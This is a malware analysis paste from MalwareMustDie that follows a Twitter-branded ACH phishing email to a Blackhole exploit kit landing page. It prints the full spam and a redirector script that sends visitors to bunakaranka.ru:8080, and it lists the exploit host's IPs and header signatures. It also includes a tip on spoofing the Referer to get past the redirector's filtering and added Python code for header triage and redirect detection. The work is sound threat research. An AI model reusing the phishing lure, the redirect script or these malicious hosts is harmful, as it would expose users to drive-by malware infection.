#MalwareMustDie - Spam to BHEK to xxxx

MalwareMustDie, Dec 26th, 2012
=====================================
#MalwareMustDie - A quest
Spam to BHEK to ...

=====================================

// Following the "Twitter security"-lookalike spam:
// hint and follow-up by Ken Pryor

// Spam in original format (txt)

Delivered-To: xxxxx@xxxxx.com
Received: by 10.216.95.198 with SMTP id p48csp285246wef;
        Wed, 26 Dec 2012 06:58:12 -0800 (PST)
X-Received: by 10.182.36.8 with SMTP id m8mr22507914obj.93.1356533891842;
        Wed, 26 Dec 2012 06:58:11 -0800 (PST)
Return-Path: <JuniorGastelum@schmitt-title.com>
Received: from ????-?? ([92.46.240.84])
        by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
        Wed, 26 Dec 2012 06:58:11 -0800 (PST)
Received-SPF: softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) client-ip=92.46.240.84;
Authentication-Results: mx.google.com; spf=softfail (google.com: best guess record for domain of transitioning JuniorGastelum@schmitt-title.com does not designate 92.46.240.84 as permitted sender) smtp.mail=JuniorGastelum@schmitt-title.com
Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
         Wed, 26 Dec 2012 03:58:10 +0600
Date: Wed, 26 Dec 2012 03:58:10 +0600
From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Reply-To: noreply@postmaster.twitter.com
To: xxxxx@xxxxx.com
Message-Id: <1KC8PY8L49UMD_TPA1QU8PAABSYQ9C03@522357004.twitter.com.tmail>
Subject: Re: Banking security update.
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary=mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
X-Campaignid: twitter51056991109478
X-Twitterimpressionid: am-57174748899437484147607592
Errors-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Bounces-To: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Return-Path: c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com
X-OriginalArrivalTime: Wed, 26 Dec 2012 03:58:10 +0600 FILETIME=[726C4133:38072607]

--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

Dear Online Account Operator,

Your ACH  transactions have been
temporarily disabled.
 View details

Best regards,
Security department


--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit


<html>
  <body >
Dear Online Account Operator, <br><br>
Your ACH  transactions have been <br>
temporarily disabled. <br>
 <a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details </a><br><br>

Best regards,<br>
Security department<br><br><br><br><br>

</body>
</html>
--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51--


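// What the header block above tells an analyst, written out as an added Python example (this is not code from the original paste): the display From claims postmaster.twitter.com, but the Return-Path the receiving MX wrote is JuniorGastelum@schmitt-title.com; SPF soft-fails for the connecting host 92.46.240.84; the hop "from ham-cannon.twitter.com ... by schmitt-title.com" sits below the MX's own Received line, so it was written by the sender and proves nothing; and the only link goes to bibliotekarz.pl. SAMPLE is constructed from the headers on the page with the body trimmed to the HTML part; the two-label domain cut and the wording of the findings are assumptions of mine, not anything the page states.

```python
"""Header triage for the 'Twitter' ACH spam above.

Added example, not code from the MalwareMustDie paste. SAMPLE is constructed
from the headers printed on the page, with the body trimmed to the HTML part.
"""
import re
from email import message_from_bytes, policy
from email.utils import parseaddr
from urllib.parse import urlsplit

SAMPLE = b"""Received: by 10.216.95.198 with SMTP id p48csp285246wef;
        Wed, 26 Dec 2012 06:58:12 -0800 (PST)
Return-Path: <JuniorGastelum@schmitt-title.com>
Received: from ????-?? ([92.46.240.84])
        by mx.google.com with ESMTP id y4si7207599obv.81.2012.12.26.06.58.08;
        Wed, 26 Dec 2012 06:58:11 -0800 (PST)
Authentication-Results: mx.google.com; spf=softfail smtp.mail=JuniorGastelum@schmitt-title.com
Received: from ham-cannon.twitter.com ([199.59.148.236]) by schmitt-title.com;
         Wed, 26 Dec 2012 03:58:10 +0600
From: Twitter <c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com>
Subject: Re: Banking security update.
Content-Type: multipart/alternative; boundary=mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
Return-Path: c-5BQNLSLFTEG8=GHPWD8F.N98-2309f@postmaster.twitter.com

--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit

<html><body>Dear Online Account Operator,<br>
Your ACH transactions have been temporarily disabled.<br>
<a href="http://www.bibliotekarz.pl/sites/all/themes/mail2.htm">View details</a>
</body></html>
--mimepart_91LG5J09EV2KC_B8OGT5A5Z5PXZ5OI51--
"""

# "from <helo-name> ([ip]) by <host>"; the first Gmail hop has no "from" part.
HOP_RE = re.compile(
    r"(?:from\s+(?P<host>\S+)\s+\(?\[(?P<ip>[\d.]+)\]\)?\s+)?by\s+(?P<by>[^\s;]+)", re.I)


def base_domain(host):
    """Last two labels only (assumption: good enough for the hosts in the
    sample). Real tooling would consult the Public Suffix List."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def received_chain(msg):
    """Received hops, newest first, as (helo_host, ip, by) tuples."""
    hops = []
    for raw in msg.get_all("Received", []):
        m = HOP_RE.search(" ".join(str(raw).split()))
        if m:
            hops.append((m["host"], m["ip"], m["by"]))
    return hops


def link_hosts(msg):
    """Hostnames of every href in the HTML part."""
    html = msg.get_body(preferencelist=("html",)).get_content()
    return sorted({urlsplit(u).hostname for u in re.findall(r'href=["\']([^"\']+)', html)})


def triage(raw_bytes):
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    from_domain = base_domain(parseaddr(str(msg["From"]))[1].split("@")[-1])
    # The topmost Return-Path is the one our MX wrote from the SMTP MAIL FROM;
    # the one at the bottom arrived with the message and is the sender's claim.
    envelope = parseaddr(str(msg.get_all("Return-Path")[0]))[1]
    spf = re.search(r"spf=(\w+)", str(msg.get("Authentication-Results", "")))
    hops = received_chain(msg)
    # The first hop carrying an IP is our MX's record of who connected; every
    # hop below it was written by the sender and cannot be trusted.
    mx = next(i for i, h in enumerate(hops) if h[1])
    connecting_ip = hops[mx][1]
    forged = [h[0] for h in hops[mx + 1:] if h[0] and base_domain(h[0]) == from_domain]
    findings = []
    if base_domain(envelope.split("@")[-1]) != from_domain:
        findings.append(f"From claims {from_domain} but envelope sender is {envelope}")
    if spf and spf[1] != "pass":
        findings.append(f"SPF {spf[1]} for {envelope} from {connecting_ip}")
    for host in forged:
        findings.append(f"sender-written hop claims {host}; MX actually saw {connecting_ip}")
    links = link_hosts(msg)
    for host in links:
        if base_domain(host) != from_domain:
            findings.append(f"link points off-brand to {host}")
    return {"from_domain": from_domain, "envelope": envelope,
            "spf": spf[1] if spf else None, "connecting_ip": connecting_ip,
            "forged_hops": forged, "link_hosts": links, "findings": findings}


if __name__ == "__main__":
    for line in triage(SAMPLE)["findings"]:
        print("-", line)
```

// The order of the Received lines is the whole point: anything below the line your own MX added is under the sender's control, so a brand name appearing there is a claim, not a fact.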
// Fetch the linked page. Tip: set the Referer to the domain the spam impersonates (twitter.com here); a redirector may behave differently for requests that arrive without a plausible one.

--2012-12-27 02:24:45--  http://www.bibliotekarz.pl/sites/all/themes/mail2.htm
Resolving www.bibliotekarz.pl (www.bibliotekarz.pl)... 194.181.21.145
Caching www.bibliotekarz.pl => 194.181.21.145
Connecting to www.bibliotekarz.pl (www.bibliotekarz.pl)|194.181.21.145|:80... connected.
Created socket 3.
Releasing 0x28804160 (new refcount 1).

---request begin---
GET /sites/all/themes/mail2.htm HTTP/1.1
Referer: http://twitter.com
User-Agent: MalwareMustDie is painting red X-mark on your door!
Accept: */*
Host: www.bibliotekarz.pl
Connection: Keep-Alive

---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Wed, 26 Dec 2012 16:16:06 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/5.2.14
Last-Modified: Wed, 26 Dec 2012 16:07:02 GMT
ETag: "250ef8-1a7-4d1c39eecf580"
Accept-Ranges: bytes
Content-Length: 423
Cache-Control: max-age=1209600
Expires: Wed, 09 Jan 2013 16:16:06 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

---response end---
200 OK
Saving to: `mail2.htm'
2012-12-27 02:24:47 (8.08 MB/s) - `mail2.htm' saved [423/423]


// Inside the fetched file (note that it sits under the Drupal path sites/all/themes/ of a third-party site):

@unixfreaxjp /malware]$ cat mail2.htm
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
</script>

</body>


  133.  
  134. // LANDING PAGE:
  135.  
  136.  http://bunakaranka.ru:8080/forum/links/column.php
  137.  
  138. // Blackhole PoC:
  139.  
  140. Resolving bunakaranka.ru (bunakaranka.ru)... 210.71.250.131, 187.85.160.106, 91.224.135.20
  141. Caching bunakaranka.ru => 210.71.250.131 187.85.160.106 91.224.135.20
  142. Connecting to bunakaranka.ru (bunakaranka.ru)|210.71.250.131|:8080... connected.
  143.  
  144. // THis pattern/signatures;:
  145. Server: nginx/1.0.10
  146. Date: Wed, 26 Dec 2012 17:30:46 GMT
  147. Content-Type: text/html; charset=CP-1251
  148. Connection: keep-alive
  149. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  150.  
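// Two things to automate from the redirector and the landing host above: pull the real destination out of the "Please wait" page without running its JavaScript, and match a landing response against the header traits recorded under the signature comment. The Python below does both; it is an added example and not code from the original paste. REDIRECTOR is the mail2.htm captured above, RESPONSE is the header block above with an assumed "HTTP/1.1 200 OK" status line, and the indicator names, and the assumption that these five traits together describe this host, are mine: they are only what this page observed, not a general Blackhole rule.

```python
"""From the 'Please wait' redirector to the Blackhole landing host.

Added example, not code from the MalwareMustDie paste. REDIRECTOR is the
mail2.htm captured above (as saved, it has no closing </html>); RESPONSE is
the landing-host header block shown above with an assumed status line.
"""
import re
from urllib.parse import urlsplit

REDIRECTOR = """<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://bunakaranka.ru:8080/forum/links/column.php";}
</script>
</body>
"""

RESPONSE = """HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 26 Dec 2012 17:30:46 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
"""

# location = "...", location.href = "...", location.replace("..."), location.assign("...")
LOCATION_RE = re.compile(
    r"""location(?:\.href)?\s*(?:=|\.(?:replace|assign)\s*\()\s*(["'])(?P<url>[^"']+)\1""", re.I)
META_REFRESH_RE = re.compile(
    r"""<meta[^>]+http-equiv=["']?refresh["']?[^>]+url=(?P<url>[^"'>\s]+)""", re.I)
# "b = a; ... if (a == b)": a comparison that is always true at run time.
GUARD_RE = re.compile(r"(\w+)\s*=\s*(\w+)\s*;.*?if\s*\(\s*(?:\1\s*==\s*\2|\2\s*==\s*\1)\s*\)", re.S)


def redirect_targets(html):
    """Every URL the page would send the browser to, found statically."""
    urls = [m["url"] for m in LOCATION_RE.finditer(html)]
    urls += [m["url"] for m in META_REFRESH_RE.finditer(html)]
    return urls


def trivial_guard(html):
    """True when the redirect sits behind an always-true comparison such as
    'var2=var1; if(var1==var2)'; it adds nothing to the logic, which makes it
    a marker in its own right."""
    return GUARD_RE.search(html) is not None


def parse_headers(response_text):
    """Response headers as a lower-cased dict; the status line is skipped."""
    headers = {}
    for line in response_text.strip().splitlines()[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def landing_indicators(url, response_text):
    """Names of the traits this page recorded for bunakaranka.ru that the
    given URL and response share. All five together is this host; one or
    two alone prove nothing."""
    u = urlsplit(url)
    h = parse_headers(response_text)
    hits = []
    if u.port not in (None, 80, 443):
        hits.append("nonstandard-port")
    if re.fullmatch(r"/forum/links/\w+\.php", u.path or ""):
        hits.append("php-under-forum-links")
    if h.get("server") == "nginx/1.0.10":
        hits.append("server-nginx-1.0.10")
    if "cp-1251" in h.get("content-type", "").lower():
        hits.append("charset-cp1251")
    if "dotdeb" in h.get("x-powered-by", "").lower():
        hits.append("php-dotdeb-build")
    return hits


if __name__ == "__main__":
    for target in redirect_targets(REDIRECTOR):
        print(target, "| always-true guard:", trivial_guard(REDIRECTOR))
        print("indicators:", landing_indicators(target, RESPONSE))
```

// Keep the extraction static: the redirector is the first thing the kit controls, and rendering it in a real browser is exactly what the "Internet Explorer / Mozilla Firefox compatible only" line is asking you to do.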

// You know the drill from here; just follow the guidance posts at malwaremustdie.blogspot.com!

---
MalwareMustDie - Dec 26th 2012